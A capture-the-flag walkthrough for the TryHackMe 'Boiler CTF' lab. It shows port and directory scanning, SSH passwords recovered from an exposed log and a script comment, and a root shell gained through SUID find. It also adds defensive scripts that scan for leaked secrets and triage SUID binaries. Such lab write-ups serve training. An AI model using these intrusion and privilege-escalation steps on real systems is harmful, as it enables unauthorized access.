
【TryHackMe】Boiler CTF:Walkthrough


Overview

This is a walkthrough of the TryHackMe room "Boiler CTF".

Task1

Q1.File extension after anon login

Run a port scan against the target.

$ nmap -Pn -T4 -sVC -A --min-rate 5000 -p- 10.10.129.124 -oN nmap_result
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.55.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_/
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)

The open ports are summarised below.

Port   Service  Version
21     ftp      vsftpd 3.0.3
80     http     Apache httpd 2.4.18 (Ubuntu)
10000  http     MiniServ 1.930 (Webmin)
55007  ssh      OpenSSH 7.2p2

Anonymous FTP login is allowed, so log in and look around for files (use ls -la, since the interesting file is hidden).

$ ftp 10.10.129.124
Connected to 10.10.129.124.
220 (vsFTPd 3.0.3)
Name (10.10.129.124:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||49155|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt

The only file in the anonymous directory is the hidden .info.txt, so the extension is txt.

A.txt

Q2.What is on the highest port?

A.ssh

Q3.What's running on port 10000?

A.webmin

Q4.Can you exploit the service running on that port? (yay/nay answer)

A.nay

Q5.What CMS can you access?

Run a directory scan against port 80.

$ dirsearch -u http://10.10.129.124
[04:55:53] 301 -  315B  - /joomla  ->  http://10.10.129.124/joomla/
[04:55:53] 301 -  329B  - /joomla/administrator  ->  http://10.10.129.124/joomla/administrator/
[04:55:59] 301 -  315B  - /manual  ->  http://10.10.129.124/manual/
[04:56:00] 200 -  201B  - /manual/index.html
[04:56:01] 200 -    4KB - /joomla/
[04:56:20] 200 -  178B  - /robots.txt

Joomla is the CMS in use.

A.joomla

Q7.The interesting file name in the folder?

Enumerate further, this time recursively beneath /joomla.

$ dirsearch -r -u http://10.10.144.242/joomla
[07:12:16] 200 -  301B  - /joomla/_test/log.txt

/joomla/_test/log.txt was found, and it holds SSH credentials: the sshd "Accepted password" line for the user basterd carries a trailing comment with the password.

$ curl http://10.10.144.242/joomla/_test/log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.

A.log.txt

Task2

Q1.Where was the other users pass stored(no extension, just the name)?

SSH into port 55007 as basterd with the password superduperp@$$ from log.txt.

$ ssh -p 55007 basterd@10.10.144.242
$ whoami
basterd

The stoner user's password is in /home/basterd/backup.sh, left as a comment directly below USER=stoner.

/home/basterd/backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
             echo "Begining copy of" $i  >> $LOG
             scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
             echo $i "completed" >> $LOG

                if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
                    rm $SOURCE/$i
                    echo $i "removed" >> $LOG
                    echo "####################" >> $LOG
                                else
                                        echo "Copy not complete" >> $LOG
                                        exit 0
                fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi
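Both credentials on this box were found by reading files that should never have contained them: a password appended as a comment to an sshd log line in log.txt, and a password parked in a comment in backup.sh. The following scanner is an added example (not part of the original walkthrough) that flags both patterns in arbitrary text files and reports the hits with the secret masked. The sample files it writes are constructed to mirror log.txt and backup.sh; SECRET_RE, secret_hits, masked_hits and write_samples are this example's own names.

```shell
#!/bin/sh
# Added example: heuristic scan for credentials left in comments or log
# annotations, the two leaks that gave away basterd's and stoner's passwords.

# Pattern 1: "pass", "passwd" or "password" followed by ':' or '='
#            (matches the "#pass: ..." annotation in log.txt).
PASS_RE='[Pp]ass(word|wd)?[[:space:]]*[:=]'
# Pattern 2: a whole-line comment that is one token of 8+ characters with no
#            spaces, excluding shebangs ("#!...") -- a bare password in a comment
#            (matches "#superduperp@$$no1knows" in backup.sh).
COMMENT_RE='^#[^!#[:space:]][^[:space:]]{7,}$'
SECRET_RE="$PASS_RE|$COMMENT_RE"

# secret_hits FILE: print the line numbers of suspicious lines, one per line.
secret_hits() {
    grep -n -E "$SECRET_RE" "$1" | cut -d: -f1
}

# masked_hits FILE: print "LINENO:<line>" with the secret token replaced by
# "****", so a finding can be reported without copying the credential itself.
masked_hits() {
    grep -n -E "$SECRET_RE" "$1" |
        sed -E -e "s/($PASS_RE[[:space:]]*)[^[:space:]]+/\1****/" \
               -e "s/^([0-9]+:)#[^!#[:space:]][^[:space:]]{7,}$/\1#****/"
}

# write_samples DIR: constructed inputs modelled on the files from the box.
write_samples() {
    cat > "$1/log.txt" <<'EOF'
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
EOF
    cat > "$1/backup.sh" <<'EOF'
#!/bin/bash
REMOTE=1.2.3.4
USER=stoner
#superduperp@$$no1knows
LOG=/home/stoner/bck.log
EOF
}

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
write_samples "$SAMPLE_DIR"

# Report: line 3 of log.txt and line 4 of backup.sh, secrets masked.
masked_hits "$SAMPLE_DIR/log.txt"
masked_hits "$SAMPLE_DIR/backup.sh"
```

Run it over a web root or a home directory with `find DIR -type f -exec sh -c 'masked_hits "$1"' _ {} \;` style loops; the heuristics are deliberately narrow (a lowercase/capitalised "pass" keyword, or a single-token comment) so they stay quiet on ordinary shell scripts and logs.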
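One more thing worth noticing in backup.sh, beyond the password: its "copy completed?" check cannot fail. The test `[ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ]` uses an unquoted command substitution, so when the remote ls prints nothing (file missing, ssh refused, host down) the command collapses to `[ -n ]`, a one-argument test that is true for any non-empty string, "-n" included, and the local file is deleted even though nothing was copied. The script below is an added example (not code from the walkthrough or from the box) that reproduces the check next to a corrected one; remote_ls stands in for the ssh call and REMOTE_OUTPUT for its stdout, both names being this example's own.

```shell
#!/bin/sh
# Added example: why the completion check in backup.sh always passes.

# Stand-in for `ssh $USER@$REMOTE ls $TARGET/$DATE/$i`; prints REMOTE_OUTPUT.
remote_ls() { printf '%s' "$REMOTE_OUTPUT"; }

# Same shape as the script's check: unquoted command substitution.
# Prints "deleted" (rm would run) or "kept".
check_unquoted() {
    # Unquoted on purpose to reproduce the original; with empty output this
    # becomes `[ -n ]`, which is true.
    if [ -n `remote_ls` ]; then echo deleted; else echo kept; fi
}

# Corrected check: quoting keeps an empty result as an empty argument so -n
# can fail, and a non-zero exit from the remote command also keeps the file.
check_quoted() {
    out=$(remote_ls) || { echo kept; return; }
    if [ -n "$out" ]; then echo deleted; else echo kept; fi
}

REMOTE_OUTPUT=""          # simulate: remote copy is missing
check_unquoted            # deleted  -- the source file would be removed anyway
check_quoted              # kept
REMOTE_OUTPUT="data1"     # simulate: remote copy is present
check_unquoted            # deleted
check_quoted              # deleted
```

The same fix applies to every other unquoted expansion in the script (`$SOURCE/$i`, `$TARGET/$DATE`); a filename containing whitespace would split the arguments to scp and rm just as silently.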

A.backup

Q2.user.txt

Switch to the stoner account with that password (su stoner) and read the user flag from /home/stoner/.secret.

You made it till here, well done.

A.You made it till here, well done.

Q3.What did you exploit to get the privileged user?

Search for binaries with the SUID bit set.

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/find

/usr/bin/find has the SUID bit set, and GTFOBins documents a privilege-escalation technique for it.

A.find
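The `find / -perm -u=s -type f` search above lists every SUID file, and the reader then has to recognise which ones GTFOBins can turn into a shell. The script below is an added example (not from the walkthrough) that does that triage automatically: it enumerates SUID files under a root directory and marks the well-known shell spawners. To stay runnable without root it builds a small constructed tree in a temp directory and plants the SUID bit on its own files; SHELL_SPAWNERS, suid_candidates, triage_suid and count_high are this example's own names, and the spawner list is a hand-picked subset of GTFOBins' SUID entries, not the full list.

```shell
#!/bin/sh
# Added example: enumerate SUID binaries and flag known shell spawners.

# Subset of GTFOBins SUID entries that hand back an interactive shell directly.
SHELL_SPAWNERS="bash dash sh find env python python2 python3 perl vim nano less more awk gawk nmap"

# suid_candidates ROOT: every regular file with the setuid bit under ROOT.
# -perm -4000 is the same test as the walkthrough's -perm -u=s.
suid_candidates() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# triage_suid ROOT: "HIGH <path>" for a known shell spawner, "INFO <path>" otherwise.
triage_suid() {
    suid_candidates "$1" | while IFS= read -r path; do
        base=$(basename "$path")
        verdict=INFO
        for s in $SHELL_SPAWNERS; do
            if [ "$base" = "$s" ]; then verdict=HIGH; break; fi
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# count_high ROOT: number of HIGH findings, for a one-shot pass/fail check.
count_high() {
    triage_suid "$1" | grep -c '^HIGH '
}

# --- constructed demo tree (mirrors what was found on the box) ---------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/usr/bin" "$DEMO/bin"
for f in usr/bin/find usr/bin/passwd bin/ping; do
    : > "$DEMO/$f"
    chmod 4755 "$DEMO/$f"      # setuid root on a real system; owner-setuid here
done
: > "$DEMO/usr/bin/ls"
chmod 0755 "$DEMO/usr/bin/ls"  # no setuid bit: must not be listed

triage_suid "$DEMO"
```

On the real box, running `triage_suid /` as stoner produces the single HIGH line for /usr/bin/find that answers this question; passwd, ping and the other stock SUID helpers show up as INFO and can be ignored unless their versions are known to be vulnerable.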

Q4.root.txt

Use /usr/bin/find to spawn a root shell. The -p flag keeps the shell from dropping its effective UID back to the real one, which is why the resulting shell is root rather than stoner; -quit stops find after the first match so only one shell is spawned.

$ /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root

The root flag is in /root/root.txt.

/root/root.txt
It wasn't that hard, was it?

A.It wasn't that hard, was it?
